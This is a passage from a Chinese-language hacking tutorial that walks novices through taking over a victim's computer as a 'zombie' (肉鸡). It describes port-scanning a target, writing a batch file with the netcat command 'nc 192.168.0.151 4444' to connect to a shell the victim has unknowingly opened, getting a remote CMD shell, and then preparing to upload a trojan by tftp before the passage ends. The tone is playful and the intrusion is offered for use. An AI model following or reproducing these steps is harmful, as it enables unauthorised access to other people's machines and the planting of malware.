抓一只“肉鸡”

等“鸡”上钩

    玩了一会儿游戏，该有人打开了吧？试试吧。我选中一个发过去的目标，用“傻瓜化端口扫描器”小扫一下，果然4444打开着啊（如图6），嘻嘻。然后该祭出黑客必备利器——瑞士军刀NC来连接肉鸡以实现我们的计划了。

图6 打开对方端口

    下载NC，将其放在一个文件夹下，如上面说的，打开“记事本”程序，在其中输入如下的代码：nc 192.168.0.151 4444 （192.168.0.151是目标肉鸡的IP地址，4444就是它打开的待接端口喽），然后保存为一个批处理文件2.bat，和nc.exe放在同一个目录里。

    双击运行2.bat这个文件，看见了？我们的NC顺利的连接上了肉鸡（如图7），并且返回了一个CMDShell，现在我们在这个窗口里的操作就等同于在肉鸡上执行命令了，嘻嘻。该是上传个木马的时候了，总不能什么都在这个命令提示符里操作吧，多不方便啊。说到上传木马，黑客最常用的就是tftp上传了，但是小菜们可能还不太熟悉tftp的使用，下面我来详细操作一下。

图7 顺利地抓到一只“肉鸡”